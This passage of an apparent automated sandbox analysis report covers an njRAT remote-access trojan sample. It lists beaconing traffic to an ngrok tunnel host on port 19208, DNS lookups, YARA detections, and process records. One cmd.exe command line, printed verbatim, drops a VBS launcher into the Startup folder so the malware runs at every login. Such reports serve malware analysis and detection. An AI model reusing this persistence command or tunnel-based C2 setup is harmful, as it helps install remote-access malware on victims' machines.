Feb 8, 2024 06:52:41.611957073 CET	19208	49740	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:42.788156986 CET	49741	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:43.098881960 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:43.098999023 CET	49741	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:43.701802969 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:43.927443981 CET	49741	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:45.605256081 CET	49741	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:45.916361094 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:45.916408062 CET	49741	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:46.157058001 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:46.166770935 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:46.167069912 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:46.167279959 CET	49741	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:46.226820946 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:46.477857113 CET	19208	49741	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:47.638750076 CET	49742	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:47.953180075 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:47.953282118 CET	49742	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:48.618848085 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:48.696115971 CET	49742	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:48.846164942 CET	49742	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:49.160322905 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:49.160445929 CET	49742	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:49.359652996 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:49.367676020 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:49.367727041 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:49.367743969 CET	49742	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:49.367821932 CET	49742	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:49.474631071 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:49.681912899 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:49.681952953 CET	19208	49742	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:50.873823881 CET	49743	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:51.183826923 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:51.184030056 CET	49743	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:51.823415041 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:52.021461964 CET	49743	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:53.287877083 CET	49743	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:53.597979069 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:53.598280907 CET	49743	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:53.805542946 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:53.805568933 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:53.805639982 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:53.805753946 CET	49743	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:53.805753946 CET	49743	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:53.908154964 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:54.115638971 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:54.115658998 CET	19208	49743	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:55.317816973 CET	49745	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:55.635162115 CET	19208	49745	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:55.635271072 CET	49745	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:56.289158106 CET	19208	49745	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:56.427463055 CET	49745	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:56.886497021 CET	49745	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:57.204763889 CET	19208	49745	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:57.204844952 CET	49745	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:57.417884111 CET	19208	49745	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:57.417987108 CET	19208	49745	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:57.418059111 CET	49745	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:57.521555901 CET	19208	49745	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:57.734498024 CET	19208	49745	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:58.954699993 CET	49746	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:59.271222115 CET	19208	49746	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:59.271356106 CET	49746	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:59.929399014 CET	19208	49746	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:00.114921093 CET	49746	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:02.654804945 CET	49746	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:02.971333981 CET	19208	49746	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:02.971540928 CET	49746	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:03.191222906 CET	19208	49746	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:03.191256046 CET	19208	49746	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:03.191299915 CET	49746	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:03.288253069 CET	19208	49746	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:03.507889986 CET	19208	49746	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:04.695415974 CET	49747	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:05.002795935 CET	19208	49747	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:05.002902031 CET	49747	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:05.601321936 CET	19208	49747	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:05.724286079 CET	49747	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:05.744098902 CET	49747	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:06.051457882 CET	19208	49747	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:06.051598072 CET	49747	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:06.281382084 CET	19208	49747	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:06.281409025 CET	19208	49747	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:06.281554937 CET	49747	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:06.358928919 CET	19208	49747	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:06.588835955 CET	19208	49747	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:07.811352015 CET	49748	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:08.124687910 CET	19208	49748	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:08.124778986 CET	49748	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:08.735963106 CET	19208	49748	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:08.912024021 CET	49748	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:09.670780897 CET	49748	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:09.984121084 CET	19208	49748	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:09.984297037 CET	49748	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:10.201806068 CET	19208	49748	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:10.201828957 CET	19208	49748	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:10.201894999 CET	49748	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:10.297754049 CET	19208	49748	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:10.515765905 CET	19208	49748	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:11.718614101 CET	49749	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:12.028656960 CET	19208	49749	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:12.028742075 CET	49749	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:12.701911926 CET	19208	49749	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:12.818131924 CET	49749	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:13.881752014 CET	49749	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:14.193500042 CET	19208	49749	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:14.193775892 CET	49749	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:14.407618999 CET	19208	49749	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:14.407684088 CET	19208	49749	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:14.407747030 CET	49749	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:14.503679991 CET	19208	49749	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:14.717931986 CET	19208	49749	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:15.935183048 CET	49750	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:16.244921923 CET	19208	49750	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:16.245023012 CET	49750	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:16.854620934 CET	19208	49750	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:16.911806107 CET	49750	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:17.004564047 CET	49750	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:17.314510107 CET	19208	49750	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:17.314757109 CET	49750	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:17.568639040 CET	19208	49750	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:17.568665028 CET	19208	49750	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:17.568731070 CET	49750	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:53:17.624469042 CET	19208	49750	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:17.879414082 CET	19208	49750	3.6.115.64	192.168.2.4
Feb 8, 2024 06:53:20.008032084 CET	49751	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:20.321981907 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:20.322130919 CET	49751	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:21.049010038 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:21.224282026 CET	49751	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:22.365303040 CET	49751	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:22.678221941 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:22.678919077 CET	49751	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:22.919680119 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:22.922563076 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:22.922597885 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:22.922657013 CET	49751	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:22.991986990 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:23.235651016 CET	19208	49751	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:24.951441050 CET	49752	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:25.265242100 CET	19208	49752	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:25.265315056 CET	49752	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:25.933825970 CET	19208	49752	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:26.114947081 CET	49752	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:27.364367962 CET	49752	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:27.674191952 CET	19208	49752	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:27.674321890 CET	49752	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:27.918960094 CET	19208	49752	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:27.918981075 CET	19208	49752	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:27.919070959 CET	49752	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:27.986257076 CET	19208	49752	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:28.229434013 CET	19208	49752	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:29.578706026 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:29.893304110 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:29.893543005 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:30.585926056 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:30.724319935 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:46.051244974 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:46.051456928 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:47.167038918 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:47.481920958 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:47.482033968 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:47.687119007 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:47.695275068 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:47.695477962 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:47.700843096 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:47.700917959 CET	49753	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:47.796653032 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:48.010262012 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:48.015302896 CET	19208	49753	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:51.925764084 CET	49754	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:52.237373114 CET	19208	49754	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:52.237663031 CET	49754	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:53:52.840913057 CET	19208	49754	3.6.98.232	192.168.2.4
Feb 8, 2024 06:53:52.912017107 CET	49754	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:54:08.227086067 CET	19208	49754	3.6.98.232	192.168.2.4
Feb 8, 2024 06:54:08.227163076 CET	49754	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:54:17.203250885 CET	49754	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:54:17.515252113 CET	19208	49754	3.6.98.232	192.168.2.4
Feb 8, 2024 06:54:17.728889942 CET	19208	49754	3.6.98.232	192.168.2.4
Feb 8, 2024 06:54:17.728907108 CET	19208	49754	3.6.98.232	192.168.2.4
Feb 8, 2024 06:54:17.728955030 CET	49754	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:54:18.990099907 CET	49754	19208	192.168.2.4	3.6.98.232
Feb 8, 2024 06:54:19.301290035 CET	19208	49754	3.6.98.232	192.168.2.4
Feb 8, 2024 06:54:21.440963984 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:21.757199049 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:21.757291079 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:22.426882982 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:22.614939928 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:37.956661940 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:37.956773996 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:53.280251026 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:53.280303001 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:57.629246950 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:57.945998907 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:57.946110964 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:58.163780928 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:58.175700903 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:58.175721884 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:58.175797939 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:58.175827980 CET	49755	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:54:58.262989044 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:58.492016077 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:54:58.492065907 CET	19208	49755	3.6.115.182	192.168.2.4
Feb 8, 2024 06:55:08.199980974 CET	49756	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:55:08.511111021 CET	19208	49756	3.6.115.182	192.168.2.4
Feb 8, 2024 06:55:08.511215925 CET	49756	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:55:09.115459919 CET	19208	49756	3.6.115.182	192.168.2.4
Feb 8, 2024 06:55:09.224248886 CET	49756	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:55:24.546283960 CET	19208	49756	3.6.115.182	192.168.2.4
Feb 8, 2024 06:55:24.546421051 CET	49756	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:55:39.862131119 CET	19208	49756	3.6.115.182	192.168.2.4
Feb 8, 2024 06:55:39.862287045 CET	49756	19208	192.168.2.4	3.6.115.182
Feb 8, 2024 06:55:55.174097061 CET	19208	49756	3.6.115.182	192.168.2.4
Feb 8, 2024 06:55:55.174159050 CET	49756	19208	192.168.2.4	3.6.115.182

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2024 06:52:16.763992071 CET	65333	53	192.168.2.4	1.1.1.1
Feb 8, 2024 06:52:16.884437084 CET	53	65333	1.1.1.1	192.168.2.4
Feb 8, 2024 06:53:19.826287985 CET	50740	53	192.168.2.4	1.1.1.1
Feb 8, 2024 06:53:19.945987940 CET	53	50740	1.1.1.1	192.168.2.4
Feb 8, 2024 06:54:21.279057026 CET	55488	53	192.168.2.4	1.1.1.1
Feb 8, 2024 06:54:21.398575068 CET	53	55488	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 8, 2024 06:52:16.763992071 CET	192.168.2.4	1.1.1.1	0xfff2	Standard query (0)	0.tcp.in.ngrok.io	A (IP address)	IN (0x0001)	false
Feb 8, 2024 06:53:19.826287985 CET	192.168.2.4	1.1.1.1	0x5ac1	Standard query (0)	0.tcp.in.ngrok.io	A (IP address)	IN (0x0001)	false
Feb 8, 2024 06:54:21.279057026 CET	192.168.2.4	1.1.1.1	0xbbb7	Standard query (0)	0.tcp.in.ngrok.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 8, 2024 06:52:16.884437084 CET	1.1.1.1	192.168.2.4	0xfff2	No error (0)	0.tcp.in.ngrok.io	3.6.115.64	A (IP address)	IN (0x0001)	false
Feb 8, 2024 06:53:19.945987940 CET	1.1.1.1	192.168.2.4	0x5ac1	No error (0)	0.tcp.in.ngrok.io	3.6.98.232	A (IP address)	IN (0x0001)	false
Feb 8, 2024 06:54:21.398575068 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	0.tcp.in.ngrok.io	3.6.115.182	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	06:51:50
Start date:	08/02/2024
Path:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:51:50
Start date:	08/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:51:50
Start date:	08/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:51:51
Start date:	08/02/2024
Path:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:51:58
Start date:	08/02/2024
Path:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:51:59
Start date:	08/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:51:59
Start date:	08/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:51:59
Start date:	08/02/2024
Path:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Wow64 process (32bit):	true
